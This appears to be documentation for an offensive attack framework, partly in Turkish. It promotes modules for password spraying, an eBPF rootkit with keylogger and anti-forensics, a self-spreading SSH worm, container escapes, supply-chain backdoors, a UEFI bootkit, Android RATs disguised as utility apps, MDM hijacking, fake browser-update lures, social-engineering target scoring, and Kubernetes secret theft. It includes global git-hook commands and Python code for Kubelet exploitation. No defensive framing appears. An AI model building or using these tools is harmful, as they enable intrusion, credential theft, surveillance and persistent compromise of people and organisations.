│ Lockout-Aware Smart Timing ⏱️ │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ AI PATTERN ANALYSIS SUPPORTED PROTOCOLS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ PASSWORD PATTERNS DETECTED ┌─────────────────────────────┐ │
│ ┌─────────────────────────────┐ │ 📁 LDAP │ │
│ │ 🌸 Season + Year │ │ 🗂️ SMB │ │
│ │ Summer2026!, Winter2025 │ │ 🖥️ RDP │ │
│ │ │ │ ☁️ Office 365 │ │
│ │ 🏢 Company + Year │ │ 📧 OWA │ │
│ │ Acme2026!, Corp@2026 │ │ 🔒 Cisco VPN │ │
│ │ │ │ 🔐 Fortinet VPN │ │
│ │ 📅 Month + Year │ │ 💻 SSH │ │
│ │ January2026!, Feb2026 │ │ 🎫 Kerberos │ │
│ │ │ └─────────────────────────────┘ │
│ │ 👋 Welcome Patterns │ │
│ │ Welcome2026!, Welcome1! │ SMART FEATURES │
│ │ │ ├── 🧠 Policy Inference from Samples │
│ │ 🔑 Password Patterns │ ├── ⏱️ Lockout-aware Timing │
│ │ Password2026!, P@ss1! │ ├── 📊 Probability Scoring │
│ │ │ ├── 🎯 High-value Target Priority │
│ │ 🔄 Change Me Patterns │ └── 📈 Success Rate Optimization │
│ │ Changeme2026!, Change@1 │ │
│ └─────────────────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
POST /spray/api/analyze - Analyze password policy
POST /spray/api/preview - Preview password candidates
POST /spray/api/start - Start smart spray
GET /spray/api/job/{id} - Get job status
GET /spray/api/job/{id}/results - Get job results
GET /spray/api/protocols - List supported protocols
## � Linux Infrastructure Domination (February 2026)
Windows tamamlandı, sıra Linux sunucularda! Kernel seviyesinde stealth, SSH ile auto-spread ve container breakout.
### 👻 eBPF Rootkit Engine
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 👻 eBPF ROOTKIT ENGINE │
│ Kernel-Level Stealth Without Loadable Kernel Modules │
│ tools/ebpf_rootkit.py (~800 lines) │
│ ⚠️ KERNEL LEVEL ⚠️ │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ HIDING CAPABILITIES │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ SYSCALL HOOKS SPECIAL FEATURES │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 👁️ getdents64 → Process │ │ 📡 XDP Packet Capture │ │
│ │ hiding from ps, top │ │ Network-level filtering │ │
│ │ │ │ │ │
│ │ 📁 stat/lstat → File │ │ ⌨️ Keylogger │ │
│ │ hiding from ls, find │ │ Input tracepoint hook │ │
│ │ │ │ │ │
│ │ 🔌 open → Prevent access │ │ 🔓 Privilege Escalation │ │
│ │ to hidden files │ │ Cred struct manipulation │ │
│ │ │ │ │ │
│ │ 🌐 tcp4_seq_show → Network │ │ 🛡️ LSM Hooks (5.7+) │ │
│ │ connection hiding │ │ Security policy bypass │ │
│ └─────────────────────────────┘ └─────────────────────────────┘ │
│ │
│ PERSISTENCE METHODS │
│ ├── 🔧 systemd service (auto-load at boot) │
│ ├── ⏰ cron job (periodic reload) │
│ ├── 📚 ld.so.preload (library hijacking) │
│ ├── 🔌 udev rules (device-triggered) │
│ └── 🧩 modprobe.d (kernel module params) │
│ │
│ ANTI-FORENSICS │
│ ├── 🕵️ Hide from bpftool │
│ ├── 📊 Hide eBPF maps │
│ ├── 📝 Log tampering │
│ └── ⏱️ Timestamp manipulation │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
GET /ebpf-rootkit/api/status - Module status
POST /ebpf-rootkit/api/check-support - Check kernel eBPF support
POST /ebpf-rootkit/api/generate/process-hide - Generate process hiding eBPF
POST /ebpf-rootkit/api/generate/file-hide - Generate file hiding eBPF
POST /ebpf-rootkit/api/generate/xdp-filter - Generate XDP packet filter
POST /ebpf-rootkit/api/persistence - Generate persistence scripts
POST /ebpf-rootkit/api/anti-forensics - Generate anti-forensics scripts
### 🔑 SSH Worm & Key Harvester
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🔑 SSH WORM & KEY HARVESTER │
│ Auto-Propagating SSH Exploitation & Credential Harvesting │
│ tools/ssh_worm.py (~700 lines) │
│ 🐛 SELF-SPREADING 🐛 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ KEY HARVESTING TARGET DISCOVERY │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ HARVEST SOURCES DISCOVERY METHODS │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 🔐 ~/.ssh/id_rsa │ │ 📋 known_hosts parsing │ │
│ │ 🔐 ~/.ssh/id_ed25519 │ │ ⚙️ SSH config parsing │ │
│ │ 🔐 ~/.ssh/id_ecdsa │ │ 📜 Bash history analysis │ │
│ │ 🔐 ~/.ssh/id_dsa │ │ 🗂️ /etc/hosts parsing │ │
│ │ 🔑 Authorized keys │ │ 📡 ARP cache discovery │ │
│ │ 📝 Private key passwords │ │ 🔍 Network scanning │ │
│ └─────────────────────────────┘ └─────────────────────────────┘ │
│ │
│ PROPAGATION FEATURES │
│ ├── 🚀 Auto-spread with harvested keys │
│ ├── 🎯 Multi-hop propagation (configurable depth) │
│ ├── 👻 Stealth mode (minimal footprint) │
│ ├── 📦 Self-replicating payload generation │
│ └── 🔄 Recursive target discovery │
│ │
│ IMPLANT TYPES │
│ ├── 🐍 Python implant (full featured) │
│ ├── 🐚 Bash one-liner (minimal) │
│ └── 📡 Reverse shell callback │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
GET /ssh-worm/api/status - Worm status
POST /ssh-worm/api/harvest-keys - Harvest SSH keys
POST /ssh-worm/api/parse-known-hosts - Parse known_hosts
POST /ssh-worm/api/discover-targets - Discover targets
POST /ssh-worm/api/propagate - Start propagation
POST /ssh-worm/api/generate-payload - Generate worm payload
POST /ssh-worm/api/generate-implant - Generate stealthy implant
### 🐳 Docker Container Escape
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🐳 DOCKER CONTAINER ESCAPE │
│ Container Breakout & Host System Compromise │
│ tools/docker_escape.py (~700 lines) │
│ 🚪 BREAKOUT 🚪 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ ESCAPE METHODS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ PRIVILEGED ESCAPES KERNEL EXPLOITS │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 👑 --privileged mode │ │ 🔥 DirtyPipe │ │
│ │ Full host /dev access │ │ CVE-2022-0847 │ │
│ │ │ │ Kernel 5.8-5.16.11 │ │
│ │ 🔌 Docker socket mounted │ │ │ │
│ │ Spawn privileged cont. │ │ 🐄 DirtyCow │ │
│ │ │ │ CVE-2016-5195 │ │
│ │ 🔧 CAP_SYS_ADMIN │ │ Kernel < 4.8.3 │ │
│ │ Mount host filesystem │ │ │ │
│ │ │ │ 📁 core_pattern │ │
│ │ 🔍 CAP_SYS_PTRACE │ │ RCE on crash │ │
│ │ Process injection │ └─────────────────────────────┘ │
│ └─────────────────────────────┘ │
│ │
│ NAMESPACE ESCAPES DETECTION │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 🖥️ Host PID namespace │ │ 🐳 Docker runtime │ │
│ │ /proc/PID/root access │ │ 📦 containerd │ │
│ │ │ │ 🦭 Podman │ │
│ │ 🌐 Host NET namespace │ │ 🔷 CRI-O │ │
│ │ Network pivoting │ │ 📦 LXC │ │
│ │ │ │ │ │
│ │ 📂 Cgroup release_agent │ │ Auto-detects: │ │
│ │ Classic escape (v1) │ │ • Capabilities │ │
│ │ │ │ • Sensitive mounts │ │
│ │ 🔄 /proc/sys abuse │ │ • Seccomp/AppArmor │ │
│ │ Kernel param modify │ │ • Kernel version │ │
│ └─────────────────────────────┘ └─────────────────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
GET /docker-escape/api/status - Module status
POST /docker-escape/api/detect - Detect container environment
POST /docker-escape/api/enumerate - Enumerate escape vectors
POST /docker-escape/api/get-payload - Get escape payload
POST /docker-escape/api/attempt - Attempt escape
GET /docker-escape/api/escape-methods - List all escape methods
## 📦 Supply Chain & Dependency Attacks (Tedarik Zinciri 2.0) - February 2025
Modern yazılım tedarik zincirine yönelik gelişmiş saldırı modülleri. Dependency confusion, typosquatting ve malicious package injection yetenekleri.
### 🎯 Dependency Confusion Scanner
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🎯 DEPENDENCY CONFUSION ATTACK │
├─────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────┐ ┌──────────────────┐ ┌─────────────────┐ │
│ │ Target │ │ Public PyPI │ │ Attacker │ │
│ │ Company │ │ / NPM │ │ Server │ │
│ └──────┬──────┘ └────────┬─────────┘ └────────┬────────┘ │
│ │ │ │ │
│ │ pip install │ │ │
│ │ internal-pkg │ │ │
│ │──────────────────────> │ │ │
│ │ │ │ │
│ │ ⚠️ Package not found │ │ │
│ │ in private registry │ │ │
│ │ │ │ │
│ │ 📦 Attacker uploads │ <─────────────────────────│ │
│ │ malicious package │ internal-pkg v99.0.0 │ │
│ │ with same name │ │ │
│ │ │ │ │
│ │ 🎯 Higher version │ │ │
│ │ gets priority! │ │ │
│ │<────────────────────────│ │ │
│ │ │ │ │
│ ┌──────┴──────┐ │
│ │ 💀 CODE │ │
│ │ EXECUTION │ │
│ └─────────────┘ │
│ │
│ SCAN MODES: │
│ • requirements.txt analysis │
│ • package.json / package-lock.json │
│ • Pipfile / Pipfile.lock │
│ • setup.py / pyproject.toml │
│ │
└─────────────────────────────────────────────────────────────────────────────────────────┘
### 🔧 Git Repository Backdoorer (Pre-Commit Hooks)
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ �� GIT REPO BACKDOOR INJECTION │
├─────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ TARGET HOOKS: PAYLOAD TYPES: PERSISTENCE: │
│ ├── pre-commit ├── Reverse Shell ├── Global Git Config │
│ ├── post-commit ├── Credential Stealer ├── Template Directory │
│ ├── pre-push ├── SSH Key Exfil ├── Core.hooksPath │
│ ├── post-merge ├── Environment Dump └── Alias Injection │
│ ├── pre-receive ├── Token Harvester │
│ └── post-checkout └── Custom Payload │
│ │
│ ATTACK FLOW: │
│ ┌─────────────────────────────────────────────────────────────────────────────────┐ │
│ │ 1. Developer clones repo │ │
│ │ 2. Malicious hook in .git/hooks/ │ │
│ │ 3. Developer makes commit │ │
│ │ 4. Hook executes silently │ │
│ │ 5. Credentials/tokens exfiltrated │ │
│ │ 6. Reverse shell established │ │
│ └─────────────────────────────────────────────────────────────────────────────────┘ │
│ │
│ GLOBAL HOOK INJECTION: │
│ $ git config --global core.hooksPath /tmp/.hidden-hooks │
│ $ git config --global init.templateDir /tmp/.git-templates │
│ │
└─────────────────────────────────────────────────────────────────────────────────────────┘
### ⌨️ Typosquatting Generator
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ ⌨️ TYPOSQUATTING ATTACK GENERATOR │
├─────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ORIGINAL: requests │
│ │
│ GENERATED TYPOS: │
│ ┌─────────────────────────────────────────────────────────────────────────────────┐ │
│ │ OMISSION │ reqests, rquests, requsts, request │ │
│ │ ADDITION │ rrequests, reqquests, requestss │ │
│ │ TRANSPOSITION │ erquests, rqeuests, reuqests │ │
│ │ REPLACEMENT │ eequest, rwquests, requasts │ │
│ │ HOMOGLYPH │ requests (cyrillic e), requests │ │
│ │ BIT-FLIP │ 2equests, pequests, sequest │ │
│ └─────────────────────────────────────────────────────────────────────────────────┘ │
│ │
│ AUTO-REGISTRATION: │
│ • PyPI package upload │
│ • NPM package publish │
│ • RubyGems submission │
│ │
└─────────────────────────────────────────────────────────────────────────────────────────┘
### 📦 Malicious Package Generator
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 📦 MALICIOUS PACKAGE GENERATOR │
├─────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ INJECTION POINTS: PAYLOAD FEATURES: │
│ ├── setup.py ├── Anti-Sandbox Detection │
│ ├── __init__.py ├── Delayed Execution │
│ ├── install hooks ├── Environment Fingerprinting │
│ ├── post-install scripts ├── Obfuscated Code │
│ └── entry points └── Multi-Stage Loader │
│ │
│ EVASION TECHNIQUES: │
│ • Time-delayed activation │
│ • CI/CD environment detection │
│ • VM/Container detection │
│ • Geolocation-based activation │
│ │
└─────────────────────────────────────────────────────────────────────────────────────────┘
### 🔗 Supply Chain API Endpoints
GET /supply-chain/ - Supply Chain Attack Dashboard
POST /supply-chain/api/scan - Scan dependencies for confusion vulnerabilities
POST /supply-chain/api/generate-confusion - Generate confusion package
POST /supply-chain/api/git-backdoor - Inject git hook backdoor
POST /supply-chain/api/typosquat - Generate typosquat variants
POST /supply-chain/api/global-hook - Set global git hook path
## 🔧 Hardware & Network Infrastructure (Fiziksel ve Ağ) - February 2025
Kabloların ve çiplerin içine giren saldırı modülleri. Donanım seviyesinde kalıcılık ve ağ trafiği yakalama.
### 🧛 Switch & Router "Vampire" (Port Mirroring)
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🧛 VAMPIRE PORT MIRRORING MODULE │
├─────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ SUPPORTED DEVICES: │
│ ├── Cisco Catalyst (SPAN/RSPAN/ERSPAN) │
│ ├── Juniper EX/QFX Series (Port Mirroring) │
│ ├── HP ProCurve │
│ └── Any SNMP-enabled device │
│ │
│ ATTACK FLOW: │
│ ┌─────────────────────────────────────────────────────────────────────────────────┐ │
│ │ 1. SNMP/SSH ile switch'e erişim │ │
│ │ 2. Port mirroring session oluştur │ │
│ │ 3. Source port(lar)ı belirle (CEO, finans portları) │ │
│ │ 4. Destination port olarak attacker makinesini ayarla │ │
│ │ 5. Tüm trafik pasif olarak dinlenir │ │
│ │ 6. Wireshark/tcpdump ile capture │ │
│ └─────────────────────────────────────────────────────────────────────────────────┘ │
│ │
│ STEALTH TECHNIQUES: │
│ • High session IDs (900+) kullan │
│ • Rate limiting ile trafik azalt │
│ • VLAN filtering │
│ • Scheduled capture (sadece iş saatleri) │
│ │
└─────────────────────────────────────────────────────────────────────────────────────────┘
### ⚡ UEFI Bootkit Installer (Kalıcılığın Zirvesi)
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ ⚡ UEFI BOOTKIT INSTALLER │
├─────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ⚠️ WARNING: DONANIM SEVİYESİNDE KALICILIK - GERİ DÖNÜŞÜ ZOR │
│ │
│ PAYLOAD TYPES: │
│ ├── Bootloader Hook → bootmgfw.efi hook (ESP partition) │
│ ├── SPI Flash Implant → BIOS çipine yazma (format atmak bile çözmez!) │
│ ├── Secure Boot Bypass → CVE-2022-21894 (BlackLotus style) │
│ └── NVRAM Persistence → UEFI değişkenlerinde saklama │
│ │
│ PERSISTENCE LEVELS: │
│ ┌─────────────────────────────────────────────────────────────────────────────────┐ │
│ │ Level 1: ESP Partition - Survives reinstall: YES, Format: NO │ │
│ │ Level 2: NVRAM Variables - Survives reinstall: YES, Format: YES │ │
│ │ Level 3: SPI Flash - Survives reinstall: YES, Format: YES, Disk: YES │ │
│ └─────────────────────────────────────────────────────────────────────────────────┘ │
│ │
│ KNOWN BOOTKITS (Reference): │
│ • LoJax (APT28/Fancy Bear) - First UEFI rootkit in the wild │
│ • MosaicRegressor - Advanced UEFI implant │
│ • CosmicStrand - Chinese APT firmware implant │
│ • BlackLotus - First to bypass Secure Boot │
│ │
└─────────────────────────────────────────────────────────────────────────────────────────┘
### 🖨️ Printer "Job Capture" Module
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🖨️ PRINTER JOB CAPTURE MODULE │
├─────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ TARGET PORTS: │
│ ├── 9100 (JetDirect/RAW) - Primary target │
│ ├── 631 (IPP) - Internet Printing Protocol │
│ ├── 515 (LPD) - Line Printer Daemon │
│ └── 80/443 (Web) - Admin interface │
│ │
│ PJL ATTACK TECHNIQUES: │
│ ┌─────────────────────────────────────────────────────────────────────────────────┐ │
│ │ @PJL INFO ID → Printer info gathering │ │
│ │ @PJL FSDIRLIST NAME="0:\\" → Directory listing │ │
│ │ @PJL FSUPLOAD NAME="file" → Download stored jobs │ │
│ │ @PJL DEFAULT HOLD=ON → Enable job retention (future capture) │ │
│ │ @PJL RDYMSG DISPLAY="HACKED" → LCD message display │ │
│ └─────────────────────────────────────────────────────────────────────────────────┘ │
│ │
│ TARGET DOCUMENTS: │
│ 💰 Maaş Bordroları (Salary reports) │
│ 📊 CEO/Board Raporları (Executive reports) │
│ 🔑 Şifre Listeleri (Password lists) │
│ 📄 Gizli Sözleşmeler (Confidential contracts) │
│ │
└─────────────────────────────────────────────────────────────────────────────────────────┘
### 🔗 Hardware Infrastructure API Endpoints
GET /hardware-infra/ - Hardware Infra Dashboard
POST /hardware-infra/api/scan-devices - Scan network devices (switches/routers)
POST /hardware-infra/api/cisco-span - Generate Cisco SPAN config
POST /hardware-infra/api/juniper-mirror - Generate Juniper mirror config
POST /hardware-infra/api/snmp-mirror - SNMP-based port mirroring
GET /hardware-infra/api/stealth-techniques - Evasion techniques
POST /hardware-infra/api/analyze-uefi - Analyze target UEFI
POST /hardware-infra/api/uefi-payload - Generate UEFI bootkit payload
GET /hardware-infra/api/known-bootkits - Known bootkit references
POST /hardware-infra/api/scan-printers - Scan network printers
POST /hardware-infra/api/pjl-exploit - Generate PJL exploit
POST /hardware-infra/api/ps-exploit - Generate PostScript exploit
POST /hardware-infra/api/capture-script - Full capture automation script
## 📱 Mobile & IoT Attack Suite (Cebimizdeki Düşman) - February 2025
Mobil cihazları ve IoT altyapısını hedef alan gelişmiş saldırı araçları. Android telefonlardan iOS'a, şirket MDM sistemlerinden akıllı cihazlara kadar tüm mobil ekosistemine sızın.
### 👻 Android Ghost RAT APK Generator
\`\`\`
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 👻 ANDROID GHOST RAT APK GENERATOR │
│ Masum Görünümlü APK - İçinde Hayalet RAT 👻 │
│ tools/mobile_iot.py (~1000 lines) │
│ 🎭 "Calculator Pro" ama aslında... 🎭 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
DECOY APP TEMPLATES:
🧮 Calculator Pro - com.calc.pro.free
🔦 Flashlight Plus - com.flashlight.super.bright
📷 QR Scanner Fast - com.qrcode.scanner.fast
🌤️ Weather Daily - com.weather.daily.forecast
🔋 Battery Saver Max - com.battery.saver.optimize
🧹 Phone Cleaner Pro - com.cleaner.booster.free
🔐 VPN Shield Free - com.vpn.shield.secure
🎮 Brain Puzzle Game - com.puzzle.brain.trainer
RAT CAPABILITIES (Hidden):
📱 SMS Read/Send - Read & send messages (2FA theft)
�� Call Log Access - Spy on call history
👥 Contacts Dump - Exfiltrate all contacts
📍 Live Location - GPS tracking in background
📷 Camera Access - Silent photo/video capture
🎙️ Microphone - Ambient audio recording
📂 File Browser - Browse entire storage
🔐 Keylogger - Accessibility-based keylogging
📲 Screen Capture - Take screenshots
⚙️ Device Admin - Anti-uninstall protection
🔔 Notification Spy - Read all notifications
BUILD PROCESS:
┌───────────────┐ ┌───────────────┐ ┌───────────────┐
│ Select Decoy │ -> │ Choose Caps │ -> │ Generate APK │
│ Template │ │ (RAT Powers) │ │ + Smali │
└───────────────┘ └───────────────┘ └───────────────┘
│ │ │
v v v
"Calculator Pro" SMS + Camera + Looks legit, acts
icon & name Location + ... as RAT
\`\`\`
### 📱 MDM Hijacker (Intune / Jamf / Workspace ONE)
\`\`\`
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 📱 MDM HIJACKER SUITE │
│ Tek Komut = Şirketteki TÜM Telefonlar Ele Geçirildi 📱 │
│ Microsoft Intune / Jamf / VMware WS1 Attacks │
│ 🎯 Enterprise Fleet Pwnership 🎯 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
SUPPORTED MDM PLATFORMS:
┌─────────────────────────────────────────────────────────────────┐
│ PLATFORM │ VENDOR │ AUTH TYPE │ FEATURES │
├─────────────────────────────────────────────────────────────────┤
│ Microsoft Intune │ Microsoft │ Azure AD │ iOS/Android │
│ Jamf Pro │ Jamf │ API Token │ macOS/iOS │
│ Workspace ONE │ VMware │ OAuth2 │ All devices │
│ MobileIron │ Ivanti │ API Key │ Enterprise │
│ Meraki SM │ Cisco │ Dashboard │ Simple MDM │
└─────────────────────────────────────────────────────────────────┘
ATTACK EFFECTS:
🔴 Install malicious apps on ALL devices
🔴 Deploy rogue CA certificates (MITM all HTTPS)
🔴 Push WiFi profiles (connect to attacker AP)
🔴 Deploy VPN profiles (route all traffic to attacker)
🔴 Remote wipe devices (DoS attack)
🔴 Exfiltrate device inventory
\`\`\`
### 🍎 iOS Malicious Profile Injection
\`\`\`
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🍎 iOS MALICIOUS PROFILE INJECTION │
│ .mobileconfig = iPhone'un Tam Kontrolü 🍎 │
│ Root CA + VPN + WiFi + MDM = Complete iOS Pwnership │
└─────────────────────────────────────────────────────────────────────────────────────────┘
MALICIOUS PROFILE TYPES:
┌─────────────────────────────────────────────────────────────────┐
│ PROFILE TYPE │ RISK │ ATTACK EFFECT │
├─────────────────────────────────────────────────────────────────┤
│ CA Certificate │ CRITICAL │ Decrypt ALL HTTPS traffic │
│ VPN Profile │ CRITICAL │ Route traffic to attacker VPN │
│ WiFi Profile │ HIGH │ Auto-connect to evil twin │
│ Email Profile │ HIGH │ Intercept all email │
│ Restrictions │ MEDIUM │ Disable security features │
│ MDM Enrollment │ CRITICAL │ Full device control │
└─────────────────────────────────────────────────────────────────┘
\`\`\`
### 🔗 Mobile & IoT API Endpoints
\`\`\`
GET /mobile-iot/ - Mobile & IoT Dashboard
GET /mobile-iot/api/app-templates - List decoy app templates
GET /mobile-iot/api/rat-capabilities - Available RAT capabilities
POST /mobile-iot/api/generate-apk - Generate Ghost RAT APK config
POST /mobile-iot/api/generate-smali - Generate Smali payload code
POST /mobile-iot/api/generate-manifest - Generate AndroidManifest.xml
GET /mobile-iot/api/mdm-platforms - List supported MDM platforms
POST /mobile-iot/api/scan-mdm - Scan MDM panel for vulnerabilities
POST /mobile-iot/api/intune-attack - Generate Intune attack scripts
POST /mobile-iot/api/jamf-attack - Generate Jamf attack scripts
GET /mobile-iot/api/profile-types - List malicious profile types
POST /mobile-iot/api/generate-profile - Generate iOS .mobileconfig
## 🧠 Psychological & Social Engineering Ops - February 2025
İnsanı hacklemek - The human is always the weakest link. Psikolojik manipülasyon ve sosyal mühendislik saldırıları için gelişmiş araç seti.
### 🔗 LinkedIn Profiler & Relationship Mapper
\`\`\`
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🔗 LINKEDIN PROFILER & RELATIONSHIP MAPPER │
│ Hedef Şirketin Çalışanlarını Map'le, Zayıf Halkayı Bul │
│ tools/social_engineering_ops.py (~800 lines) │
│ 🎯 "New Hire = En Kolay Kurban" 🎯 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
WHAT IT DOES:
📊 Şirketin TÜM çalışanlarını LinkedIn'den toplar
📈 Organizasyon şemasını çıkarır (Kim kimin müdürü?)
🎯 Vulnerability score hesaplar (Kim en kolay hedef?)
🆕 New Hire'ları tespit eder (< 90 gün = zayıf halka)
🤖 AI ile phishing hedeflerini otomatik seçer
VULNERABILITY SCORING:
┌─────────────────────────────────────────────────────────────────┐
│ FACTOR │ SCORE │ WHY IT MATTERS │
├─────────────────────────────────────────────────────────────────┤
│ New Hire (< 90 days)│ +90 │ Doesn't know processes yet │
│ Job Seeker │ +85 │ Open to "opportunities" │
│ Recent Promotion │ +70 │ Eager to please │
│ Active Social Media │ +60 │ Shares too much info │
│ Incomplete Profile │ +55 │ Less security aware │
│ Many Connections │ +40 │ Accepts anyone │
└─────────────────────────────────────────────────────────────────┘
DEPARTMENT VALUE (for lateral movement):
IT/Security: 95 → Domain Admin access potential
DevOps: 85 → CI/CD pipeline access
HR: 75 → All employee data
Finance: 70 → Wire transfer authority
Executive: 100 → Ultimate authority
AI PHISHING RECOMMENDATIONS:
Input: Company employee list
Output: Prioritized target list with:
- Attack vector suggestion
- Pretext/email template
- Success probability
- Best timing
\`\`\`
### 🔄 Fake Update Landing Page Generator
\`\`\`
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🔄 FAKE UPDATE LANDING PAGE GENERATOR │
│ "Tarayıcınız Güncel Değil!" - Ama Aslında RAT İndiriyorsunuz │
│ Chrome / Edge / Firefox / Safari - Birebir Aynı Tasarım │
│ 💀 Drive-by Download Attack 💀 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
SUPPORTED BROWSERS:
┌─────────────────────────────────────────────────────────────────┐
│ BROWSER │ ICON │ PAYLOAD NAME │ FAKE VERSION │
├─────────────────────────────────────────────────────────────────┤
│ Chrome │ 🔵 │ ChromeUpdate.exe │ 122.0.6261.112 │
│ Edge │ 🔷 │ EdgeUpdate.exe │ 122.0.2365.66 │
│ Firefox │ 🦊 │ FirefoxUpdate.exe │ 123.0.1 │
│ Safari │ 🧭 │ SafariUpdate.pkg │ 17.3.1 │
└─────────────────────────────────────────────────────────────────┘
URGENCY LEVELS:
🔴 CRITICAL: "ACIL GÜVENLİK AÇIĞI TESPİT EDİLDİ"
🟠 HIGH: "Önemli güvenlik güncellemesi mevcut"
🟡 MEDIUM: "Yeni sürüm kullanılabilir"
HOW IT WORKS:
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ User Visits │ -> │ JS Detects │ -> │ Shows Fake │
│ Compromised │ │ Browser Type │ │ Update Page │
│ Website │ │ │ │ │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
v v v
Embedded script Chrome? Edge? "Download Now"
runs silently Firefox? → RAT payload
GENERATED ASSETS:
📄 Full HTML page (pixel-perfect browser design)
🎨 Matching gradients, logos, fonts
📊 Fake version comparison table
⬇️ Download button with progress bar
📡 Fingerprint collector (UA, screen, timezone)
🔗 Tracking pixel for visit logging
BROWSER DETECTION SCRIPT:
Embed in ANY website (XSS, compromised CMS)
Auto-redirects to browser-specific fake update
Configurable trigger (% of visitors, delay)
\`\`\`
### 🔗 Social Engineering API Endpoints
\`\`\`
GET /social-eng/ - Social Eng Ops Dashboard
POST /social-eng/api/scan-company - Scan company for employees
GET /social-eng/api/get-targets - Get top phishing targets
GET /social-eng/api/get-new-hires - Get all new hires
GET /social-eng/api/get-org-chart - Get organizational chart
GET /social-eng/api/phishing-recommendations - AI phishing recommendations
GET /social-eng/api/browser-templates - Get browser templates
POST /social-eng/api/generate-update-page - Generate fake update page
POST /social-eng/api/generate-detection-script - Generate browser detect JS
GET /social-eng/api/urgency-messages - Get urgency message templates
\`\`\`
## � K8s Kraken - Kubernetes Warfare (February 2025)
Kubernetes cluster'larının kralı ol. Kubelet API exploit'i ve Helm Chart backdoor'ları ile şirketlerin kalbine giden en kısa yolu kullan. DaemonSet persistence - silinen pod'lar geri döner!
### 🔴 K8s Kraken Teknik Detayları
\`\`\`
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🐙 K8S KRAKEN - KUBERNETES WARFARE │
│ Container & Orchestration Domination • Kubelet Exploit • Helm Backdoor │
│ tools/k8s_warfare.py (~1000 lines) │
│ 💀 "DevOps'un Korkulu Rüyası - Cluster Hijack" 💀 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
ATTACK VECTORS:
🎯 KUBELET API EXPLOIT (Port 10250)
└── Anonymous authentication check
└── Pod enumeration (all namespaces)
└── Container RCE via /run endpoint
└── Service Account token theft
└── Shadow Admin Pod deployment
└── ETCD secret extraction
📦 HELM CHART BACKDOOR GENERATOR
└── 8 Chart templates (PostgreSQL, MySQL, Redis, MongoDB, Nginx, Prometheus, Grafana, Elasticsearch)
└── Hidden DaemonSet: "metrics-collector"
└── Payload types: reverse_shell, beacon, miner
└── Base64-encoded payload in "telemetry" ConfigMap
└── Legitimate-looking Chart.yaml, values.yaml
HOW IT WORKS:
1. Scan → Find exposed Kubelet API (10250)
2. Check → Anonymous auth allowed?
3. Exploit → List pods, exec in containers
4. Steal → SA tokens from /var/run/secrets
5. Persist → Deploy shadow pod or backdoor chart
6. Dominate → DaemonSet runs on ALL nodes
STEALTH FEATURES:
✓ Pod names blend with system components
✓ Namespace: kube-system (looks native)
✓ Image: alpine:latest (minimal footprint)
✓ Labels: k8s-app: metrics-helper
✓ DaemonSet auto-respawns deleted pods
TARGET EXTRACTION:
🔑 Service Account Tokens → API Server access
🔐 ETCD Secrets → All cluster credentials
☁️ Cloud Provider Creds → AWS_ACCESS_KEY, AZURE_*
📋 ConfigMaps → Database URLs, API keys
\`\`\`
### 💀 K8s Kraken Usage
\`\`\`python
from tools.k8s_warfare import KubeletExploiter, HelmBackdoorGenerator, HelmChartType
# Kubelet API Exploit
exploiter = KubeletExploiter()
# Scan for exposed Kubelet
result = exploiter.scan_kubelet("10.0.0.1", 10250)
print(f"Exploitable: {result.auth_status.value == 'anonymous_allowed'}")
# List all pods
pods = exploiter.list_pods("10.0.0.1", 10250)
for pod in pods:
print(f"{pod['namespace']}/{pod['name']} - Privileged: {pod.get('privileged')}")
# Extract secrets
secrets = exploiter.extract_secrets("10.0.0.1", 10250)
for secret in secrets:
print(f"[{secret['type']}] {secret['pod']}: {secret['value'][:50]}...")
